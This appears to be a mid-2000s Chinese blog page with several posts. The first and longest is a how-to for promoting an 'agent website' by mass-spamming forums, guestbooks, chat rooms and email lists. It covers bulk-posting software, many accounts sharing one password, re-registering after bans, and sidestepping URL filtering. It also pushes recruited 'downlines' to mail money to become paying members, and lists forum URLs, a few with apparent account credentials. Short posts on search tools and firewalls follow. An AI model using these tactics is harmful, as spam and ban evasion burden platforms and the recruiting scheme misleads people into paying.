做代理网站最有效的4种宣传方法:
(技巧写是写有了,但是许多人做不到这一些,也许是他们怕吃苦或懒吧,这点点苦都吃不了,还谈什么赚大钱!)
一、到各大论坛上发贴。(这是最好的宣传方法,效果最好)
在论坛上发贴,我建议是手动和软件一起用。
1、手动发贴:最好是到网易论坛、网易社区、新浪论坛、搜狐论坛等几个著名的大论坛里发贴。(或者在线人数上千的论坛也行)
网易论坛:www.163.com 就是指在网易首页顶上的导航条上的论坛。
(比如:新闻 体育 财经 科技 商业 游戏 娱乐 女性 生活 房产 大学 旅游 健康 文化 教育 出国 汽车 手机 导购 广东 上海)
以上这些里面都有它的论坛,其中在以下论坛中发贴特别有效:
(体育 财经 商业 游戏 娱乐 生活 旅游)
网易社区:bj.163.com 网易社区分为:北京社区、上海社区、广州社区
但是在这3个社区发贴是有限制的:一个网易号只能在一个社区发10个贴子,网易社区有3个社区,也就是可以发10乘以3=30个贴子。
如果你注册20个号,每个号的密码都一样的,这样记起来也比较方便,那么你就可以发20乘以30=600个贴子。
新浪论坛:people.sina.com.cn/forum.html 新浪论坛里面有许多个小论坛小版块。
搜狐论坛:club.sohu.com/main.php 搜狐论坛里面也有许多个小论坛小版块。
发贴一定要在论坛的每个小论坛、每个小版块、每个能发贴的角落都要发贴
(一般人发贴发完整个网易论坛要3个小时,发完整个新浪论坛要3个小时,发完整个搜狐论坛也要2个小时),
每天只要用上几个小时在以上论坛里发贴,如果能发完整个论坛,效果就已经非常明显的啦。
发贴的标题和内容要常常变化,这样才有新鲜感,发贴的标题靠自己想了,
发贴的内容,大家可以登陆自己的创亿网络会员区首页的内部公告中有。
在发贴的过程中,如果见到同行的贴子,你也可以复制下来,修改一下之后自己用。
你只管发贴,不要管别人是否删你的贴,是否回你的贴,每天轮流地在这些论坛上发贴就是最好的,
论坛删了你的用户名,你再注册过,为了赚钱,这一点都不麻烦,只需要几秒钟来注册而已。晚上发贴,效果最好。
一定要多发贴,如果你每天都能发完整个网易论坛或新浪论坛,这么你就可以拉到许多下线。
你知道吗,在网络赚钱中能赚到大钱的人,刚开始的时候天天在线,天天发贴宣传,发贴数量都在上千,
这样辛苦几个月,你的下线就很多了,以后即使你不去发贴作宣传,你的效益也会很可观的,这就叫先苦后甜了!
当有人注册你的代理网站时,你登陆进自己的代理网站的会员区里,可以看到他们的电子邮箱,
这时马上发《临时会员信》给他们。《临时会员信》在会员区首页内部公告里面有,信里的内容都是说服他寄钱加入正式会员的,
发信给他们,就是提高他们寄钱加入正式会员的机率。这个环节是非常重要的,请大家一定要做。
基本上10个临时会员就会有一个愿意寄钱成为正式会员,
但是这必须是天天发贴宣传,天天有陌生人注册的基础上才有这个规律的。
上网的时候,一定要开着QQ,这样就会发现有许多在论坛上看到你的贴子的陌生人来咨询你,
这时你就可以在QQ上说服他加入。
=====================================
2、软件发贴:就是购买或下载论坛群发软件,让它自动帮你发贴。
以下是论坛群发软件的网站:
www.qfsoft.net (网神通)
www.ltqf.com
论坛群发软件网站里面的群发软件都是一次性收费,将来免费升级。
至于价格,你就要跟该站的站长好好谈谈了。
另外,在你的IE游览器窗口上输入”论坛群发软件”6个中文字,你也能找到许多群发软件。
=====================================
二、做广告链接:
做广告链接是免费的,这是为了让更多的网站连接链上看到我的代理网站,
这样做,你的代理网站每天的日流量都能达到几百人次。
现在网络上有许多广告链,比如:太极链、红星链、飞鹰链、阳光链等等许多广告链的网站,
只要你注册进去,就会得到一串广告代码,将这个代码放到你的网站里面去就链接成功了。
=====================================
三、把你的网站登录到各式各样的搜索引擎上。如:yahoo sina yeah sohu等。
在这里我就不多说了。登录搜索引擎有些是要钱的,有些是免费的,要亲自去试试才行。
=====================================
四、发名片、发传单:
印制尽可能多的名片或传单,到各网吧放到网吧门口的单车和摩托车上,隔一段时间再发一次。
=====================================
1、提供几个常用搜索
www.baidu.com 百度搜索
www.google.com/intl/zh-CN/ Google搜索
dir.sohu.com 搜狐搜索
cn.search.yahoo.com 雅虎搜索
www.3721.com 3721搜索
so.163.com 网易搜索
通过以上搜索,键入关键词”留言本”、”留言簿”,可以搜索到许多网站的免费留言
本,持之以恒地去发宣传,定会有收益!
键入关键词”个人主页”、”个人网页”、”个人网站”,可以找到许多的个人网站,通过”联系
方式”和他们取得联系:发E-mail,加QQ都可。如果能够发展日访问量比较大的个人主页的
站长成为你的正式会员,那你就可以日进斗金了!
*************************
2http:// www.cnitt.net/wz2/Soft_Show.asp?SoftID=330
非常不错的邮件搜索、群发软件!
*************************
3、各地网上人才市场网址集锦
http:// bbs.hnol.net/dispbbs.asp?boardID=125&;ID=232317
去这些网站的论坛或供求信息发宣传,自然事半功倍!
通过”1、提供几个常用搜索”里面的搜索,键入关键词”人才市场”,去里面相应的板块,有
针对性地发供求信息,效果也很好!
*************************
4、进聊天室宣传(新浪的聊天室就不用去了,它对网址有更改功能),积极地去论坛发帖,
以及下载使用免费的邮箱搜索和邮件群发软件,或者通过QQ 在线查找,加QQ宣传,都是
很好的宣传方式!
天空软件站,是国内知名下载网站,可以找到许多有利于宣传的软件。
http:// www.skycn.com/
下面这些论坛人气较旺,发帖效果比一般的论坛好!
论坛网址
网易 http://www.163.com
新浪 http://www.sina.com.cn
17173游戏论坛 http://bbs.17173.com
TOM海云天 http://bbs.tom.com
西陆 http://www.xilu.com
中国学生网论坛 http://www.6to23.com
网际精灵社区 http://club.netsprite.com
QQ讨论组 http://bbs.tencent.com
动网先锋 http://bbs.aspsky.net
考研论坛 http://bbs.kaoyan.com
21CN论坛 http://free.21cn.com/forum
> 中华网 http://bbs.china.com
新华网 http://www.xinhuanet.com
CCTV论坛 http://www.cctv.com/forum
英才论坛 http://bbs.chinahr.com
网大论坛 http://forum.netbig.com/forum
亿唐 http://www.etang.com
青年论坛 http://bbs.ynet.com/cgi-bin/start
天极论坛 http://bbs.yesky.com
千龙社区 http://bbs.qianlong.com/bbs.jsp
玫瑰社区 http://www.china139.com/club
南京大学 http://lilybbs.net/vd164998/main2.html
北方时空论坛 http://bbs.northtimes.com
K666休闲论坛 http://www.k666.com/bbs/NowBoard.aspx
天下论坛 http://bbs.dswl.net
论坛大全 http://www.bbs5.com
天天新论坛 http://www.ttx.com.cn/bbs/index.asp#bbs
中文之家论坛 http://bbs.chinesejia.com
CGA游戏论坛 http://www.cga.com.cn/bbs2.0
秋雁南回文学社区 http://www.backbird.com
清凉论坛 http://www.into365.com/bbs
永飞论坛 http://bbs.staridc.com
聆听社区 http://www.vicn.net
天下网吧 http://bbs.txwm.com
华人同志 http://www.goboy.org
网络男孩BBS论坛 http://www.wlboy.com/cgi-bin/bbs/leoboard.cgi
世纪论坛 http://www.21bbs.org/ibbs.dll
沪江论坛 http://www.hjbbs.com
乐趣园 http://www.netsh.com
269社区 http://218.30.21.110
001商务网社区 http://www.001.com.cn
东方论坛 http://forum.cnool.net
古城热线社区 http://forum.xaonline.com/BBSMain.asp
笑傲江湖论坛 http://bbs.xajh.com/bbs/default.asp?boardid=22
Enet社区 http://club.enet.com.cn/index.php
自由论坛 http://com.chinese.com/freebbs/forum.phtml
中国娱乐网社区 http://www.cnyule.com/club/index.php
中国体育网论坛 http://www.sport158.com/bbs/index.asp
极速社区 http://bbs.8080.net
云南信息港虚拟社区 http://club.yn.cninfo.net
兴风作浪 http://bbs.jbea.net
LINUX论坛 http://www.linuxforum.net/forum/categories.php
唐堂论坛 http://www.tangtang.com.cn/forum/forumList.asp
大洋论坛 http://club.dayoo.com
爱情之城 http://www.lovetown.org/forum
CTI论坛 http://www.ctiforum.com/bbs/ctiforum/bbs.php
中青论坛 http://bbs.cyol.com
上海论坛 http://www.91training.com/club/club/home.asp
南方社区 http://bbs.southcn.com/user/login.php
深圳社区 http://club.szptt.net.cn
BBS论坛 http://www.bbs01.com
新生代社区 http://www.agenow.com/bbs
龙虎社区 http://bbs.longhoo.net/index.php
上海热线 http://www.online.sh.cn
游戏论坛(平均每天的在线100-500人):
精灵官方社区 http://pt.netease.com
中网游论坛 http://bbs.net88.com.cn
在线世界 http://bbs.gameii.com/bbs/fb/index.php
智者论坛 http://bbs.zhie.net
火狐游戏网论坛 http://www.skyhuux.com/bbs
天使在线 http://bbs.sa20.com
西部网游论坛 http://www.51367.com/bbs
逍遥游网 http://bbs.sachxp.com/NowBoard.aspx
108游戏论坛 http://bbs.108game.com
天府游戏论坛 http://bbs.game2me.com/index.asp
银河网游戏论坛 http://bbs.inhe.net
网通天地游戏论坛 http://bbs.cnbb.com.cn
骄阳游戏论坛 http://bbs.joyyang.com
天下游戏论坛 http://bbs.txyx.net
蓝色传奇论坛 http://www.lsmir.net/bbs/leoboard.cgi
水盟游戏论坛 http://bbs.mirx.com.cn
同一类型论坛(平均每天的在线100-300人):
中国站长论坛 http://chinaz.com/bbs
我是网管论坛 http://www.54master.com/bbs/cgi-bin/leoboard.cgi
文网社区 http://www.66166.net/zh/index.asp
淅江论坛 http://zjone.net
源码之家论坛 http://www.mycodes.net/bbs
POINT论坛 http://www.point2k.com
嘟嘟在线论坛 http://bbs1.sucaiw.com
交友中心论坛 http://bbs.96333.com
新视线论坛 http://club.tvb.com.cn/bbs
热血论坛 http://www.mirx.com.cn/mirx/bbs
南宁娱乐论坛 http://www.nnyl.com/bbs
数码都市休闲论坛 http://bbs.5city.com/index.asp
吧喔搜索社区 http://bbs.88oo.com
P2P联盟论坛 http://www.ppcn.net/ppbbs
中国魅力站 http://chinawto.vicp.net/webgame/forum/cgi-bin/leoboard.cgi
中国聋友网 http://www.longyou.net
中华爱网论坛 http://www.lovesea.net/bbs
九州梦网娱乐论坛 http://forum.bbvod.net
北同论坛 http://www.bjboy.net/bbs
电脑爱好者论坛 http://bbs.cfanclub.net
COVBB互动社区 http://bbs.cnvbb.com
宁海论坛 http://bbs.nhzj.com/cgi-bin/leoboard.cgi
大学生论坛 http://www.dxs.cn/bbs/index.asp
EDA技术论坛 http://www.51eda.com/bbs
鹭岛在线 http://bbs.china530.com
古泉社区 http://www.9877.net/bbs
WYD游戏论坛 http://bbs.wydcn.com
九度空间 http://www.changle.org/bbs/index.asp
飞跃重洋 http://www.advancededu.net/edubbs/index.asp
联盟论坛 http://www.codestudy.net/bbs/index.asp
留学论坛 http://bbs.askynz.net
酷G影界 http://www.mollisclub.net/index.asp
电影论坛
宁海社区
http://bbs.nhzj.com
★★当秀论坛★★
http://61.132.73.246/downshow/
影视帝国论坛–论坛首页
http://www.cnxp.com/
灵逍网络论坛–论坛首页
http://www.lxwlmj.com/bbs/index.asp
乌龟海岸–论坛首页
http://51c.7u7.net/
新青年论坛 – 电影下载超酷论坛
http://www.7377.net/forumdisplay.php?fid=5&page=1
Movie! Century!
http://5308.com/
ADSL世纪前线—世纪院线
http://www.avl.com.cn/movie/morevod.html
网事无忧论谈
http://www.cnnbsc.com/wswu/cgi-bin/leoboard.cgi
myftp
http://myftp.xilubbs.com/
星彤娱乐影视论坛
http://www.xtong.com/
爱加盟论坛
http://www.icalvin.ca/0075ip/index.asp
长乐社区
http://www.changle.org/clbbs/index.asp
梦想休闲论坛
http://www.changle.org/clbbs/list.asp?boardid=3
城市论坛–影视下载
http://www.alone-city.com/bbs/list.asp?boardid=15
‖娱乐大搜刮-Ps[PlaySome]‖
http://61.144.230.171/ftpsea/cgi-bin/leoboard.cg
游民部落
http://hz168.net/
纯色着迷主论坛 – powered by Discuz!
http://www.hxxp.net/forum/index.php
511剧场论坛–论坛首页
http://bbs.511vcd.com/index.asp
511影视剧场-511VCD.COM
http://www.511vcd.com/User/Reg.asp?id=299630
今生缘一生相随影视论坛
http://bbs.cdgfgs.net/bbselse.asp
九度空间
http://www.43520.com
星源影视
http://218.57.204.106/cgi-bin/lb5000/forums.cgi?forum=3
君王论坛
http://www.junwang-china.com/bbs/cgi-bin/leoboard.cgi
极速影视论坛
http://www.speedmovie.net/cgi-bin/leoboard.cgi
影视帝国论坛
http://www.cnxp.com/index.asp
天易休闲娱乐论坛
http://bbs.cnfm365.com/index.asp
88547论坛
http://forum.88547.com/cgi-bin/leoboard.cgi
☆ 酷辣虫社区 ☆
http://www.colabug.net/index.php?s=&
江西频道论坛–论坛首页
http://www.jx263.com/bbs/index.asp
超时空影视下载
http://www.6072.com/vbb/index.php?s=01ad3a02721fef1c8d1a532af44e0a8d
永飞论坛
http://bbs.staridc.com/
轩轩小筑论坛
http://www.nibz.net/bbs/index.asp
狗狗静电BBS
http://www.doggiehome.com/index.php
碧晴精品影视论坛
http://www.biqing.net/cgi-bin/loginout.cgi?forum=
小丁影视
http://www.okcup.com/aspsky/
先锋论坛
http://bbs.cnhttp.com/index.php?s=a99e1858d4d4aa1dfdc9a7455fe01067
风暴影视、音乐论坛–论坛首页
http://www.fb520.net/bbs/index.asp
傲网论坛
http://202.102.201.45/cgi-bin/leoboard.cgi
注册会员FTP资源下载公布区
http://www.p2pdown.com/cgi-bin/leoboard.cgi
E舞九天
http://221.13.11.101/
疯狂影视论坛–论坛首页
http://61.156.8.39:8199/bbs/index.asp
赚钱论坛
银品论坛–论坛首页
http://211.147.25.139/yinpin/newyinpin/bbs/index.asp
刹歇罗虚拟网络社区–论坛首页
http://www2.s000.com:2999/bbs/index.asp
环球统E赚线
http://www.up88.net/cgi-bin/leoboard.cgi
超酷的网赚人社区
http://www.earn8.com/lb/cgi-bin/leoboard.cgi
网赚之家
http://u888.net/bbs/cgi-bin/leoboard.cgi
中国网赚论坛联盟
http://www.meili365.com/cgi-bin/leoboard.cgi
易派网BBS – powered by Discuz!
http://www.epayxchange.com/bbs/logging.php?action=login
王国综合论坛 – powered by Discuz!
http://16888.goodfh.com/index.php
网赚乐园
http://esoho.51.net/cgi-bin/leoboard.cgi
赚翻了!!专业网赚论坛!! – 公告
http://www.coolala.net/cgi-bin/wenjoy/announcements.cgi
赚吧在线 – 赚吧首页
http://www.earn8.com/net/main.asp
通四信息港
http://www.tsxx.net/cgi-bin/leoboard.cgi
中国网络商联–论坛首页
http://www.cncheck.com/forum/index.asp
雅富论坛 — IPB中文HyPER版
http://www.666ol.com/forum/index.php?s=&
彩票论坛
我爱彩票–论坛首页
http://www.5icp.com/
风云足球论坛–论坛首页
http://www.11-11.cn/bbs/index.asp
华夏足彩 高手论坛–论坛首页
http://www.zucai.com/bbs/
网易体育–体坛纵横
http://bbs5.netease.com/sports/index.php?forumcode=15
足球大赢家
http://www.21088.com/
网易体育–体坛纵横
http://bbs5.netease.com/sports/forum.php?forumcode=15
足球彩经 论坛
http://www.t121.com/leadbbs/Boards.asp
中国绿茵足彩网
http://bbs.zglyzc.com/index.php
足彩信息港——群雄论剑
http://www.zucaiw.net/net/index.php
310论坛–论坛首页
http://www.cn310.com/bbs/
球迷聊斋–论坛首页
http://www.kanqiu.net/
中国博彩联盟社区-论坛首页
http://www.cpchina.net/bbs/index.asp
黄金论坛
http://js155.3322.org/cgi-bin/lb5000/leoboard.cgi
煮菜论坛–论坛首页
http://www.zgzcw.com/bbs/
东方文体交流社区–论坛首页
http://bbs.dbpw.com/index.asp
彩民交流中心–论坛首页
http://sdcp.net/dvbbs/index.asp
蓝黑军团–论坛首页
http://www.interbbs.net/index.asp
皇马在线『球迷论坛』-论坛首页
http://w
ww.realmadridcf.cn/bbs/index.asp
中国蓝波湾社区–论坛首页
http://www.chinano1.net/shequ/left.asp
福彩网论坛–列表
http://www.16886000.com/bbs/index.asp
7777777彩票预测交流论坛
http://www.cnqingdao.com/bbs/wdb/index.php
疯狂论坛–论坛首页
http://forum.jnnc.com/index.asp
南开远程论坛–论坛首页
http://www.jnrtvu.com.cn/nankai/bbs/index.as
国际米兰中文论坛-论坛首页
http://www.intermilan-cn.com/forum/index.asp
紅黑米蘭論壇
http://www.scacm.com/bbs/index.asp
招聘BBS
超闪论坛
http://sinobbs.com/index.php?tourl=http://
求职招聘论坛
http://www.tomda.com.cn/bbs2/index.asp
528招聘网
http://www.528.com.cn./ jings 12345678
欢迎访问焦点人才港
http://job.focus.cn/
求职360°ClassifiedPost
http://www.myjob360.com/web/
jobcn.com 卓博
http://www.jobcn.com/ jingsmoney 123456789
伟业必胜网
http://www.bsheng.com/
中国新闻人才网
http://www.youhr.com/
蓝色月光人才网
http://job.lanyue.com/
公司简介
http://www.dluhr.com/cn/index.htm
51job.com
http://www.51job.com/
中国医药人才网 - 个人求职
http://www.job99.com.cn/person/ jingsmoney 123456789
中国国际人才网
http://www.chinajob.com/
cn-new
http://www.hr.com.cn/new_hr/topic/list_note.php3?id=1
中国国家人才网
http://www.newjobs.com.cn/
中国聘网
http://www.cn-hr.com/
首页_伯乐招聘网
http://www.bolehr.com/
58Job网
http://www.58job.com/
中国之鹰招聘网
http://www.ryrc.com/
中关村人才网
http://www.zgcrc.com.cn/
上海招聘网.SHjob.cn..
http://www.shjob.cn/
求职 招聘 中华英才网!
http://www.chinahr.com/
百大英才百大网
http://www.badajob.com/home/
申才网
http://www.sc.sh.cn/
供求信息
http://info.yinsha.com/
Job88人才网
http://www.job88.com/sc/21CNJobseeker/index-1.htm
新浪求职频道
http://cjol.gd.sina.com.cn/
网易职业频道
http://www6.163.com/jobs/index.html
求职频道_搜狐网站
http://career.sohu.com/
聚星人力资源网
http://www.starjob.net/index.asp
白领人才网欢迎您!
http://www.80rc.com/
登龙门人力资源网络 DengLongMen.com
http://www.denglongmen.com/
jobmb 百万工作网
http://www.jobmb.com/
第一商务网—人才市场—
http://www.1st-com.net/rc/default.asp
天基人才网–英才求职
http://www.tjinfo.com/person/
人力资源开发
http://www.ganchao.com/
中国网上人才市场
http://www.ccjol.com/
卧龙冈
http://www.shalala.net/zp/
神州英才网
http://www.yingcai.net.cn/asp/index.aspx
东方人才热线
http://www.ejol.com.cn/index.asp
我要就业网
http://www.519yes.com/
人才职业网rencaijob.com
http://www.rencaijob.net/
21世纪人才信息找工作,职业咨询,招聘,人才
http://www.21sjob.com/
创思IT人才网
http://www.hr-bank.net/index.php
招聘
http://www.3boe.com/job/
中国国信网络–人才热线专栏
http://rencai.gxchina.com/
世界不大,网大
http://www.netbig.com/
金前程
http://www.golden-career.com/
http://www.ideabbs.com 提供一些最热门、最多人在线的论坛给大家
网易 http://www.163.com
搜狐 http://www.sohu.com
新浪网论坛 http://www.sina.com.cn
英才论坛 http://bbs.chinahr.com
中国学生网论坛 http://www.6to23.com
网际精灵社区 http://club.netsprite.com
21CN论坛 http://free.21cn.com/forum
玫瑰社区 http://www.china139.com/club
友联 http://bbs.viafriend.com
TOM海云天 http://bbs.tom.com
考研论坛 http://bbs.kaoyan.com
17173网络游戏论坛 http://bbs.17173.com
东方热线 http://forum.cnool.net
爱情之城 http://www.lovetown.org/forum
落伍者论坛 http://www.im286.com
k666论坛 http://www.k666.com
雷傲论坛 http://bbs.leoboard.com
碧晴论坛 http://www.biqing.net
荷里活论坛 http://www.helihuo.net
人民网论坛 http://bbs.people.com.cn
水晶论坛 http://www.lucn
.net/bbs
黑白论坛 http://www.s8s8.net/cgi-bin/leoboard.cgi s8s8
龙虎社区 http://bbs.longhoo.net/index.php
北方时空论坛 http://bbs.northtimes.com
天下论坛 http://bbs.dswl.net
天天新论坛 http://www.ttx.com.cn/bbs/index.asp#bbs
中文之家论坛 http://bbs.chinesejia.com
CGA游戏论坛 http://www.cga.com.cn/bbs2.0
秋雁南回文学社区 http://www.backbird.com
清凉论坛 http://www.into365.com/bbs
永飞论坛 http://bbs.staridc.com
聆听社区 http://www.vicn.net
天下网吧 http://bbs.txwm.com
华人同志 http://www.goboy.org
网络男孩BBS论坛 http://www.wlboy.com/cgi-bin/bbs/leoboard.cgi
世纪论坛 http://www.21bbs.org/ibbs.dll
沪江论坛 http://www.hjbbs.com
269社区 http://218.30.21.110
001商务网社区 http://www.001.com.cn
古城热线社区 http://forum.xaonline.com/BBSMain.asp
笑傲江湖论坛 http://bbs.xajh.com/bbs/default.asp?boardid=22
Enet社区 http://club.enet.com.cn/index.php
自由论坛 http://com.chinese.com/freebbs/forum.phtml
中国娱乐网社区 http://www.cnyule.com/club/index.php
中国体育网论坛 http://www.sport158.com/bbs/index.asp
极速社区 http://bbs.8080.net
云南信息港虚拟社区 http://club.yn.cninfo.net
兴风作浪 http://bbs.jbea.net
LINUX论坛 http://www.linuxforum.net/forum/categories.php
唐堂论坛 http://www.tangtang.com.cn/forum/forumList.asp
大洋论坛 http://club.dayoo.com
CTI论坛 http://www.ctiforum.com/bbs/ctiforum/bbs.php
中青论坛 http://bbs.cyol.com
上海论坛 http://www.91training.com/club/club/home.asp
南方社区 http://bbs.southcn.com/user/login.php
深圳社区 http://club.szptt.net.cn
BBS论坛 http://www.bbs01.com
新生代社区 http://www.agenow.com/bbs
上海热线 http://www.online.sh.cn
精灵官方社区 http://pt.netease.com
中网游论坛 http://bbs.net88.com.cn
在线世界 http://bbs.gameii.com/bbs/fb/index.php
智者论坛 http://bbs.zhie.net
火狐游戏网论坛 http://www.skyhuux.com/bbs
天使在线 http://bbs.sa20.com
西部网游论坛 http://www.51367.com/bbs
逍遥游网 http://bbs.sachxp.com/NowBoard.aspx
108游戏论坛 http://bbs.108game.com
天府游戏论坛 http://bbs.game2me.com/index.asp
银河网游戏论坛 http://bbs.inhe.net
网通天地游戏论坛 http://bbs.cnbb.com.cn
骄阳游戏论坛 http://bbs.joyyang.com
天下游戏论坛 http://bbs.txyx.net
蓝色传奇论坛 http://www.lsmir.net/bbs/leoboard.cgi
水盟游戏论坛 http://bbs.mirx.com.cn
中国站长论坛 http://chinaz.com/bbs
我是网管论坛 http://www.54master.com/bbs/cgi-bin/leoboard.cgi
文网社区 http://www.66166.net/zh/index.asp
淅江论坛 http://zjone.net
源码之家论坛 http://www.mycodes.net/bbs
POINT论坛 http://www.point2k.com
嘟嘟在线论坛 http://bbs1.sucaiw.com
交友中心论坛 http://bbs.96333.com
新视线论坛 http://club.tvb.com.cn/bbs
热血论坛 http://www.mirx.com.cn/mirx/bbs
南宁娱乐论坛 http://www.nnyl.com/bbs
数码都市休闲论坛 http://bbs.5city.com/index.asp
吧喔搜索社区 http://bbs.88oo.com
P2P联盟论坛 http://www.ppcn.net/ppbbs
中国魅力站 http://chinawto.vicp.net/webgame/forum/cgi-bin/leoboard.cgi
中国聋友网 http://www.longyou.net
中华爱网论坛 http://www.lovesea.net/bbs
九州梦网娱乐论坛 http://forum.bbvod.net
北同论坛 http://www.bjboy.net/bbs
电脑爱好者论坛 http://bbs.cfanclub.net
COVBB互动社区 http://bbs.cnvbb.com
宁海论坛 http://bbs.nhzj.com/cgi-bin/leoboard.cgi
大学生论坛 http://www.dxs.cn/bbs/index.asp
EDA技术论坛 http://www.51eda.com/bbs
鹭岛在线 http://bbs.china530.com
古泉社区 http://www.9877.net/bbs
WYD游戏论坛 http://bbs.wydcn.com
九度空间 http://www.changle.org/bbs/index.asp
飞跃重洋 http://www.advancededu.net/edubbs/index.asp
联盟论坛 http://www.codestudy.net/bbs/index.asp
留学论坛 http://bbs.askynz.net
酷G影界 http://www.mollisclub.net/index.asp
(百度网站排行榜)可以搜索到许多日访问量很大的网站,这些网站的论坛同时在线人数可
达数百甚至上千人,远远不是一般的小论坛可比拟的。在这样的论坛发帖,可以起到事半
功倍的作用!原则上人气差的论坛就不要浪费时间发帖宣传
分类 : 网站技术 | 发表时间 12-03-2006
分类 : 技术文摘 | 发表时间 21-02-2006
互联网搜索是眼下的热门话题,但大多数的讨论都集中在它产生的广告收入上,而非搜索过程本身正在经历的变化。此外,大部份的注意力都集中在Google和雅虎(Yahoo)这些搜索巨头上,而不是那些正在尝试通过新技术来完善搜索服务的小公司。
这些小型网站致力于完善搜索服务,提高搜索的准确度,使之更方便、更个性化。我刚刚试用了两个──PubSub和Rollyo,发现它们具备一项Google和雅虎等主流搜索引擎不具备的特色。
PubSub是一套自动系统,它不间断地在数以百万计的博客、在线讨论、新闻稿和美国证券交易委员会(SEC)存档文件中寻找和你的关键词匹配的内容,一旦找到就会通知你。Rollyo则允许你创建自己的小型搜索引擎,把焦点放在你感兴趣的话题以及你偏好的资源上。这两项搜索服务提供的都是传统搜索引擎办不到的。
Rollyo的意思是“启动你自己的搜索引擎”。虽然它用的也是雅虎的搜索技术,但允许你把检索的网站限制在那些你相信能产生最佳效果的网址上,从而锁定你的查询。如果你想找关于面包的信息,那么你可以把搜索限制在一系列你认为能提供最佳相关信息的网址上,而不必在互联网的汪洋大海中只捞到一个“发酵的酸面团”。这种个性化设置的搜索引擎叫“searchroll”
要创建一个searchroll,先登陆Rollyo网站(rollyo.com),你可以设定多达25个你认为和某个主题最为相关的网站。如果你不想手动输入要加进searchroll中的网站,也可以把浏览器里的书签上传到Rollyo,只挑选你要用的网址就行了。
创建一个searchroll后,你就可以反复用它来搜索与该主题相关的任何信息,其他访问Rollyo网站并对相同主题感兴趣的人也可以使用。同样,你也可以利用别人已经创建的searchroll。如果通过一个searchroll搜索仍然找不到自己想要的信息,只需点击一下就能把搜索范围扩大到整个互联网。
每一个searchroll都有自己的网络地址,因此你可以直接找到它,而不必在整个Rollyo网站中跋山涉水般寻找,你也可以把这个地址用电子邮件寄给别人。你甚至可以把searchroll加到Firefox网络浏览器工具栏的搜索引擎的下拉列表中去,这样不必先登陆Rollyo网站就能找到它在哪儿。
比如,我创建了一个关于我热爱的波士顿红袜棒球队(Boston Red Sox)的searchroll,里面有我最喜爱的25个关于波士顿红袜的网站,你不妨在rollyo.com/wmossberg/red_sox_nation上试一试。
Rollyo也包括由一些 “高级玩家”(High Rollers)创建的searchroll,这些是各个不同领域中的名人或专家。例如女演员黛布拉?梅辛(Debra Messing)创建了一个关于在线购物的searchroll,设计师戴安?冯?弗斯腾伯格(Diane Von Furstenberg)创建了关于时装的searchroll,专栏作家兼活动分子亚里安娜?赫芬顿(Arianna Huffington)创建了一个政治博客的searchroll。
并不是每一次搜索都要用到Rollyo,但如果你经常在几个特定的主题范围内搜索,那就值得使用或创建一个关于这个领域的searchroll。
Pubsub则是完全不同的另一种工具,它能持续更新与某个特定主题相关的信息,搜索内容包括博客、被称为新闻组的在线讨论、SEC档案和新闻稿。
在一般的搜索中,你输入一个关键词,然后搜索引擎尝试在网址索引中找到与之匹配的项目,这是一个一次性的过程。而在PubSub搜索中,关键字会持续生效,搜索引擎会一直在不断变化的、从PubSub资源中收集到的数据流中寻找匹配项目。即使在输入关键字过后好几个月,只要匹配项出现,它就会在PubSub中跳出来通知你。
PubSub自称是一个“匹配引擎”,并宣称自己是“前景光明的”、“未来的”的搜索引擎──在可能尚未出现的数据中查找。比如,我去年夏天通过PubSub进行了一次搜索,直到昨天它还在报告最新搜索结果,这些信息在我开始搜索那会儿还没有上网。
要创建一个PubSub搜索器──公司称之为“预订”,先登录pubsub.com,输入一个或多个你想让Pubsub持续搜索匹配项的关键字。你可以有很多预订项,全部免费。
你可以访问PubSub的网站来查询结果,也可以通过下载一个“侧栏”模块把PubSub加到你的浏览器中,这个模块会在一个特殊窗口中列出PubSub查询的结果,一旦发现新的匹配项就会通知你。这些侧栏适用于Windows IE以及Windows、Macintosh和Linux上的Firefox。
PubSub也能把搜索限制在某些类型的资源上,比如,只限于新闻稿。PubSub希望在未来逐渐增加更多类型的资源。
一些主要的搜索引擎正在实验跟Rollyo类似的模式,你可以在某些管理博客概要和新闻网站的“RSS读者”程序中实现PubSub的某些功能。但Rollyo和PubSub十分好用,值得一看。
分类 : 娱乐休闲 | 发表时间 19-02-2006
摘要: 随着Internet的迅猛发展,安全性已经成为网络互联技术中最关键的问题。本文全面介绍了Internet防火墙技术与产品的发展历程;详细剖析了第四代防火墙的功能特色、关键技术、实现方法及抗攻击能力;同时简要描述了Internet防火墙技术的发展趋势。
关键词:Internet 网路安全 防火墙 过滤 地址转换
1. 引言
防火墙技术是建立在现代通信网络技术和信息安全技术基础上的应用性安全技术,越来越多地应用于专用网络与公用网络的互连环境之中,尤以 Internet网络为最甚。Internet的迅猛发展,使得防火墙产品在短短的几年内异军突起,很快形成了一个产业:1995年,刚刚面市的防火墙技术产品市场量还不到1万套;到1996年底,就猛增到10万套;据国际权威商业调查机构的预测,防火墙市场将以173%的复合增长率增长,今年底将达到 150万套,市场营业额将从1995年的1.6亿美元上升到今年的9.8亿美元。
为了更加全面地了解Internet防火墙及其发展过程,特别是第四代防火墙的技术特色,我们非常有必要从产品和技术角度对防火墙技术的发展演变做一个详细的考察。
2. Internet防火墙技术简介
防火墙原是指建筑物大厦用来防止火灾蔓延的隔断墙。从理论上讲,Internet防火墙服务也属于类似的用来防止外界侵入的。它可以防止 Internet上的各种危险(病毒、资源盗用等)传播到你的网络内部。而事实上,防火墙并不像现实生活中的防火墙,它有点像古代守护城池用的护城河,服务于以下多个目的:
1)限定人们从一个特定的控制点进入;
2)限定人们从一个特定的点离开;
3)防止侵入者接近你的其他防御设施;
4)有效地阻止破坏者对你的计算机系统进行破坏。
在现实生活中,Internet防火墙常常被安装在受保护的内部网络上并接入Internet。
从上图不难看出,所有来自Internet的传输信息或你发出的信息都必须经过防火墙。这样,防火墙就起到了保护诸如电子邮件、文件传输、远程登录、在特定的系统间进行信息交换等安全的作用。从逻辑上讲,防火墙是起分隔、限制、分析的作用,这一点同样可以从图1中体会出来。那么,防火墙究竟是什么呢?实际上,防火墙是加强Internet(内部网)之间安全防御的一个或一组系统,它由一组硬件设备(包括路由器、服务器)及相应软件构成。3. 防火墙技术与产品发展的回顾
防火墙是网络安全策略的有机组成部分,它通过控制和监测网络之间的信息交换和访问行为来实现对网络安全的有效管理。从总体上看,防火墙应该具有以下五大基本功能:
●过滤进、出网络的数据;
●管理进、出网络的访问行为;
●封堵某些禁止行为;
●记录通过防火墙的信息内容和活动;
●对网络攻击进行检测和告警。
